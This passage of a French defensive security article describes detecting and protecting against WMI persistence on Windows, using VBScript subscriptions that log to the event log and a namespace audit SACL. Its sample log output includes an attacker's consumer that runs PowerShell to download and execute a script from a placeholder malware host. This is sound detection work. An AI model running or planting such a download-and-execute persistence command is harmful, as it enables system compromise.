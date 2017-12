5. Améliorations de la détection

5.1 Journalisation WMI

Un axe d’amélioration possible consiste à réaliser une journalisation « custom » en utilisant le même principe d’abonnement permanent, mais cette fois-ci en utilisant le consumer NTEventLogConsumer qui consigne des événements dans le journal « Application ».

Pour détecter la persistance convenablement, il faut s’abonner, pour chaque namespace, aux événements de création (mais également aux événements de modification, dans l’éventualité du détournement d’un objet légitime existant) des objets ci-dessous :

instance de la classe __EventFilter ;

instance de toutes classes dérivées de la classe __EventConsumer ;

instance de la classe __FilterToConsumerBinding .

L’ensemble de ces abonnements (que l’on nommera par la suite « détecteurs ») peut être instancié dans un namespace unique, à partir duquel tous les namespaces sont surveillés.

L’utilisation du VBScript pour définir ces abonnements permet d’avoir un langage supporté, quelles que soient la version et la configuration du système d’exploitation à protéger.

Set objWMIService = GetObject("winmgmts:\\.\root\default") ADMINISTRATORS_SID = Array(1,2,0,0,0,0,0,5,32,0,0,0,32,2,0,0) ' Create an Event Consumer Set objConsumer = objWMIService.Get("NTEventLogEventConsumer").SpawnInstance_() objConsumer.Name = "WMI Monitor Subscription Consumer" objConsumer.Category = 0 objConsumer.EventType = 2 objConsumer.EventID = 8 objConsumer.SourceName = "WSH" objConsumer.InsertionStringTemplates = Array("Namespace = %__Namespace%; Operation = %__Class%%TargetInstance%") objConsumer.NumberOfInsertionStrings = 1 objConsumer.CreatorSID = ADMINISTRATORS_SID ' Create an Event Filter Set objFilter = objWMIService.Get("__EventFilter").SpawnInstance_() objFilter.Name = "WMI Monitor Subscription Filter" objFilter.Query = "SELECT * FROM __InstanceOperationEvent WITHIN 300" &_ " WHERE TargetInstance ISA '__EventFilter'" &_ " OR TargetInstance ISA '__EventConsumer'" &_ " OR TargetInstance ISA '__FilterToConsumerBinding'" objFilter.QueryLanguage = "WQL" objFilter.EventNamespace = "root\subscription" objFilter.CreatorSID = ADMINISTRATORS_SID ' Bind the Filter to the Consumer Set objBinding = objWMIService.Get("__FilterToConsumerBinding").SpawnInstance_() objBinding.Filter = objFilter.Put_() objBinding.Consumer = objConsumer.Put_() objBinding.CreatorSID = ADMINISTRATORS_SID objBinding.Put_() 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 Set objWMIService = GetObject ( "winmgmts:\\.\root\default" ) ADMINISTRATORS_SID = Array ( 1 , 2 , 0 , 0 , 0 , 0 , 0 , 5 , 32 , 0 , 0 , 0 , 32 , 2 , 0 , 0 ) ' Create an Event Consumer Set objConsumer = objWMIService.Get("NTEventLogEventConsumer").SpawnInstance_() objConsumer.Name = "WMI Monitor Subscription Consumer" objConsumer.Category = 0 objConsumer.EventType = 2 objConsumer.EventID = 8 objConsumer.SourceName = "WSH" objConsumer.InsertionStringTemplates = Array("Namespace = %__Namespace%; Operation = %__Class%%TargetInstance%") objConsumer.NumberOfInsertionStrings = 1 objConsumer.CreatorSID = ADMINISTRATORS_SID ' Create an Event Filter Set objFilter = objWMIService . Get ( "__EventFilter" ) . SpawnInstance_ ( ) objFilter . Name = "WMI Monitor Subscription Filter" objFilter . Query = "SELECT * FROM __InstanceOperationEvent WITHIN 300" & _ " WHERE TargetInstance ISA '__EventFilter'" & _ " OR TargetInstance ISA '__EventConsumer'" & _ " OR TargetInstance ISA '__FilterToConsumerBinding'" objFilter . QueryLanguage = "WQL" objFilter . EventNamespace = "root\subscription" objFilter . CreatorSID = ADMINISTRATORS _ SID ' Bind the Filter to the Consumer Set objBinding = objWMIService . Get ( "__FilterToConsumerBinding" ) . SpawnInstance_ ( ) objBinding . Filter = objFilter . Put_ ( ) objBinding . Consumer = objConsumer . Put_ ( ) objBinding . CreatorSID = ADMINISTRATORS_SID objBinding . Put_ ( )

Ce code illustre le principe évoqué en journalisant des événements avec l’eventid 8 et l’eventType 2 (niveau « Avertissement »). Il se limite ici à détecter (depuis le namespace root\default) la configuration d’une persistance dans le namespace root\subscription. Le code peut facilement être modifié pour instancier les classes __EventFilter et __FilterToConsumerBinding pour chaque namespace existant. Un seul eventconsumer commun suffit. La requête et le modèle de message de logs sont écrits pour être aussi génériques que possible et ainsi minimiser le nombre d’abonnements à créer. Pour pouvoir surveiller aussi bien la création que la modification d’un objet en une seule requête, le script surveille l’instanciation de la classe parente de ces événements : __InstanceOperationEvent. De la même manière, comme il est possible à l’attaquant de compiler sa propre classe d’eventconsumer, il est plus efficace de surveiller là aussi l’instanciation de la classe parente : __EventConsumer.

Il suffit d’exécuter une seule fois un tel script pour s’abonner aux événements WMI désirés et ainsi créer des détecteurs. L’exécution du code présenté dans le chapitre 2 génère alors trois événements détaillés dans le journal « Application » :

Namespace = \\.\ROOT\subscription; Operation = __InstanceCreationEvent instance of __EventFilter { CreatorSID = {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0}; EventNamespace = "root\\cimv2"; Name = "MyFilter" Query="SELECT * FROM __InstanceModificationEvent WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Year = 2017 AND TargetInstance.Month=6 AND TargetInstance.Day=1 TargetInstance.Hour=8 AND TargetInstance.Minute=0 AND TargetInstance.Second=0 "; QueryLanguage = "WQL"; }; 1 2 3 4 5 6 7 8 9 Namespace = \ \ . \ ROOT \ subscription ; Operation = __InstanceCreationEvent instance of __EventFilter { CreatorSID = { 1 , 2 , 0 , 0 , 0 , 0 , 0 , 5 , 32 , 0 , 0 , 0 , 32 , 2 , 0 , 0 } ; EventNamespace = "root\\cimv2" ; Name = "MyFilter" Query = "SELECT * FROM __InstanceModificationEvent WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Year = 2017 AND TargetInstance.Month=6 AND TargetInstance.Day=1 TargetInstance.Hour=8 AND TargetInstance.Minute=0 AND TargetInstance.Second=0 " ; QueryLanguage = "WQL" ; } ;

Namespace = \\.\ROOT\subscription; Operation = __InstanceCreationEvent instance of CommandLineEventConsumer { CommandLineTemplate = "powershell.exe -exec bypass -Command \"IEX ((New-Object Net.WebClient).DownloadString('https://malwaresite/ex.ps1'))\""; CreatorSID = {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0}; Name = "MyConsumer"; }; 1 2 3 4 5 6 7 Namespace = \ \ . \ ROOT \ subscription ; Operation = __InstanceCreationEvent instance of CommandLineEventConsumer { CommandLineTemplate = "powershell.exe -exec bypass -Command \"IEX ((New-Object Net.WebClient).DownloadString('https://malwaresite/ex.ps1'))\"" ; CreatorSID = { 1 , 2 , 0 , 0 , 0 , 0 , 0 , 5 , 32 , 0 , 0 , 0 , 32 , 2 , 0 , 0 } ; Name = "MyConsumer" ; } ;

Namespace = \\.\ROOT\subscription; Operation = __InstanceCreationEvent instance of __FilterToConsumerBinding { Consumer = \\\\.\\root\\subscription:NTEventLogEventConsumer.Name=\MyConsumer\""; CreatorSID = {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0}; Filter = \\\\.\\root\\subscription:__EventFilter.Name=\MyFilter\""; }; 1 2 3 4 5 6 7 Namespace = \ \ . \ ROOT \ subscription ; Operation = __InstanceCreationEvent instance of __FilterToConsumerBinding { Consumer = \ \ \ \ . \ \ root \ \ subscription : NTEventLogEventConsumer . Name = \ MyConsumer \ " "; CreatorSID = {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0}; Filter = \\\\.\\root\\subscription:__EventFilter.Name=\MyFilter\"" ; } ;

Dans le cas d’un scénario de création d’un nouveau namespace afin d’y réaliser une persistance malveillante, une solution consiste à automatiser la création d’un détecteur en réponse à la création d’un namespace. L’utilisation du consumer ActiveScriptEventConsumer permet d’embarquer un tel script.

5.2 Protection des détecteurs

Le malware ou l’attaquant bénéficiant des droits administrateurs, il est théoriquement capable de supprimer ou altérer les détecteurs avant d’inscrire sa persistance. Il est donc nécessaire d’envisager une protection si l’on souhaite lutter contre ce type de scénario. L’objectif est ici de détecter l’altération ou suppression des détecteurs et de journaliser leur perte d’intégrité.

5.2.1 Via WMI

Il est tout à fait possible de réaliser la détection de l’altération des « détecteurs » en s’appuyant sur de nouveaux « détecteurs » WMI. Pour les différencier des détecteurs initiaux et ne pas semer la confusion, on les appellera (uniquement vis-à-vis de leur fonction) « vérificateurs ». Pour s’assurer de ne rien oublier, il est conseillé d’analyser les dépendances WMI de la détection mise en œuvre. Elle dépend :

d’un namespace : celui où les détecteurs sont instanciés ;

d’une classe d’eventconsumer : NtEventLogConsumer ;

du provider fournissant cette classe : NtEventLogConsumer , instance de __Win32Provider ;

de l’association de la classe au provider : instance de __EventConsumerProviderRegistration ;

des classes systèmes __EventFilter et __FilterToConsumerBinding ;

des instances des classes réalisant la persistance même (les « trios » de détection).

Une solution efficace se doit donc de surveiller l’intégrité de toutes ces dépendances. Cependant, il est important de noter que les classes systèmes ainsi que certains namespaces ne sont pas altérables, ce qui limite la surveillance à l’altération des différentes instances et classes non systèmes.

Techniquement, deux couples de « vérificateurs » peuvent fournir la solution.

Chaque couple est formé d’un vérificateur d’instances (__InstanceOperationEvent) et d’un vérificateur de classes (__ClassOperationEvent). La protection repose sur le principe que chaque couple se surveille mutuellement et que l’un d’eux surveille aussi les détecteurs. Toute suppression/modification se faisant de manière séquentielle, la surveillance mutuelle assure une capacité de journaliser la perte d’intégrité une dernière fois, quel que soit l’ordre de suppression/altération des détecteurs et vérificateurs par un (code) malveillant.

Le premier couple de vérificateurs peut être instancié dans le namespace des détecteurs et surveille le second couple. Le second couple de vérificateurs est instancié dans un autre namespace, dans le but de dissocier les dépendances (namespace, classes, provider, instances) et surveille le premier couple et les détecteurs. Ainsi, toute altération dans la chaîne des dépendances WMI d’un côté, comme de l’autre, est détectée et journalisée.

5.2.2 Via une ACL d’audit (SACL)

La détection de la perte d’intégrité des détecteurs peut être aussi déléguée au mécanisme Windows de SACL (System Access Control List) disponible depuis Windows Vista concernant l’audit d’accès aux namespaces.

L’idée est de configurer un audit d’accès en écriture au seul namespace dans lequel les détecteurs sont instanciés. Si les dépendances listées au paragraphe précédent sont altérées ou supprimées, un événement d’eventid 4662 sera journalisé dans le journal Sécurité. Seule la suppression totale du namespace ne sera pas journalisée. C’est pour cela qu’il est plus simple de placer les détecteurs dans un namespace non supprimable par un administrateur comme root\default.

La SACL peut être configurée avec le trustee Tout le monde et les droits audités suivants :

Ecriture totale : toute altération/suppression des objets internes au namespace sera journalisée ;

Modifier la sécurité : la désactivation de l’audit sera journalisée.

Le code suivant permet de positionner la SACL proposée (manuellement, wmimgmt.msc serait utilisé) :

Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate,(Security)}!\\.\root\default") Set objSystemSecurity = objWMIService.Get("__SystemSecurity=@") Ret = objSystemSecurity.GetSecurityDescriptor(objSD) Set objTrustee = objWMIService.Get("__Trustee").SpawnInstance_() objTrustee.Domain = Null objTrustee.Name = "Everyone" objTrustee.SIDString = "S-1-1-0" objTrustee.SID = Array(1,1,0,0,0,0,0,1,0,0,0,0) objTrustee.SidLength = 12 Set objACE = objWMIService.Get("__ACE").SpawnInstance_() objACE.Trustee = objTrustee objACE.AccessMask = &H4 + &H8 + &H10 + &H40000 objACE.AceFlags = &H40 objACE.AceType = 2 If objSD.ControlFlags And &H10 Then arrSACL = objSD.SACL Else arrSACL = Array() objSD.ControlFlags = objSD.ControlFlags + &H10 End If ReDim Preserve arrSACL(UBound(arrSACL) + 1) Set arrSACL(UBound(arrSACL)) = objACE objSD.SACL = arrSACL objSystemSecurity.SetSecurityDescriptor(objSD) 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 Set objWMIService = GetObject ( "winmgmts:{impersonationLevel=impersonate,(Security)}!\\.\root\default" ) Set objSystemSecurity = objWMIService . Get ( "__SystemSecurity=@" ) Ret = objSystemSecurity . GetSecurityDescriptor ( objSD ) Set objTrustee = objWMIService . Get ( "__Trustee" ) . SpawnInstance_ ( ) objTrustee . Domain = Null objTrustee . Name = "Everyone" objTrustee . SIDString = "S-1-1-0" objTrustee . SID = Array ( 1 , 1 , 0 , 0 , 0 , 0 , 0 , 1 , 0 , 0 , 0 , 0 ) objTrustee . SidLength = 12 Set objACE = objWMIService . Get ( "__ACE" ) . SpawnInstance_ ( ) objACE . Trustee = objTrustee objACE . AccessMask = & H4 + & H8 + & H10 + & H40000 objACE . AceFlags = & H40 objACE . AceType = 2 If objSD . ControlFlags And & H10 Then arrSACL = objSD . SACL Else arrSACL = Array ( ) objSD . ControlFlags = objSD . ControlFlags + & H10 End If ReDim Preserve arrSACL ( UBound ( arrSACL ) + 1 ) Set arrSACL ( UBound ( arrSACL ) ) = objACE objSD . SACL = arrSACL objSystemSecurity . SetSecurityDescriptor ( objSD )

Pour pouvoir manipuler les SACLs, le script active d’abord le privilège SeSecurity dans la chaîne de connexion (moniker). Il récupère ensuite le descripteur de sécurité associé au namespace afin de le modifier. La classe __Trustee est instanciée pour identifier le compte à auditer, puis une entrée de contrôle __ACE est créée et insérée dans le tableau des SACLs. Finalement, le nouveau descripteur de sécurité est positionné.

Pour que la SACL soit effective, il faut que la stratégie d’audit système (Configuration avancée de la stratégie d’audit) audite la sous-catégorie Auditer d’autres événements d’accès à l’objet de la rubrique Accès à l’objet. L’inquiétude légitime lorsqu’on parle de SACL est sa verbosité. Les tests réalisés montrent que la SACL configurée sur root\default ne génère pas d’événements récurrents liés à la vie normale du système (à prendre avec les précautions d’usage). Il est tentant de vouloir généraliser la SACL à l’ensemble des namespaces et en faire le mécanisme de détection unique : il faut garder à l’esprit que le niveau de détails des informations remontées via SACL ne vaut pas la journalisation « custom » WMI. De plus, certains namespaces s’avèrent verbeux lors de la vie normale du système notamment par l’activité du compte SYSTEM (qu’il serait « dangereux » pour la protection de ne pas auditer).

Conclusion

Mettre en œuvre une détection pro-active de la persistance WMI permet d’ajouter une couche de détection intermédiaire entre celle liée à l’étape de compromission et celle liée à l’exécution de la charge. Cette détection ne peut se limiter à surveiller un ou deux namespaces et quelques providers par défaut, au risque d’être contournée trivialement. On estime qu’une détection efficace peut être mise en place et qu’alors, réaliser une persistance WMI indétectable nécessiterait d’attaquer et persister sur le système en dehors du repository WMI. Déplacer le champ de bataille en quelque sorte, en terrain « mieux » connu…

Références

Jean-Philip GUICHARD

jean-philip.guichard@cea.fr

Bruno WYTTENBACH

bruno.wyttenbach@cea.fr

Service des Technologies de l’Information et Communication, Direction Énergie Nucléaire, CEA

